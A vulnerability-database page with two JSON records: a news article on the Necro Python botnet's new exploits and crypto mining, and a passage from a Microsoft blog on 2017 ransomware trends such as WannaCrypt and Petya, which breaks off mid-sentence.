DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "description": "[](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\n[](<https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s0/hacking-malware.jpg>)\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. \"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-06-03T17:01:00", "modified": "2021-06-03T17:01:42", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "immutableFields": [], "lastseen": "2022-05-09T12:38:00", "viewCount": 453, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2021-0106"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2021-21972"]}, {"type": "exploitdb", "idList": ["EDB-ID:49602", "EDB-ID:50056"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76"]}, {"type": "githubexploit", "idList": ["0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "39EADA2B-CE50-555B-910E-D3B77640C464", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "626E6774-0ACC-594C-BB61-E89F8F034B11", "64EF6553-4D22-526B-A1CC-09212DBD7625", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D4220876-A611-59AE-8262-07797542DAB9", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ibm", "idList": ["425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "WEB_APPLICATION_SCANNING_113243"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:163268"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:E908D08D4163FD6817C8B71F91A20C57"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:AF0C718105190997E9F68ECCA01B467D"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:99260"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:2F8F4C57A4BFEE821BF1AB72DB36A273", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:816878AF6F6091DFFD5EDD6489062840", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-36472"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2021-0106"]}, {"type": "cisa", "idList": ["CISA:CB32DB4C2EA92462F387E1DA6C08F57E"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"]}, {"type": "exploitdb", "idList": ["EDB-ID:49602"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "githubexploit", "idList": ["F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "securelist", "idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:99260"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "threatpost", "idList": ["THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27803"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-0144", "epss": "0.974730000", "percentile": "0.999300000", "modified": "2023-03-16"}, {"cve": "CVE-2017-0145", "epss": "0.973650000", "percentile": "0.997970000", "modified": "2023-03-16"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998170000", "modified": "2023-03-17"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1659988328, "score": 1659900266, "epss": 1679073339}, "_internal": {"score_hash": "5c21efda4fde433d1a5571f557691f9c"}}

{"mmpc": [{"lastseen": "2017-09-08T08:23:33", "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions opens across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom pain in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators 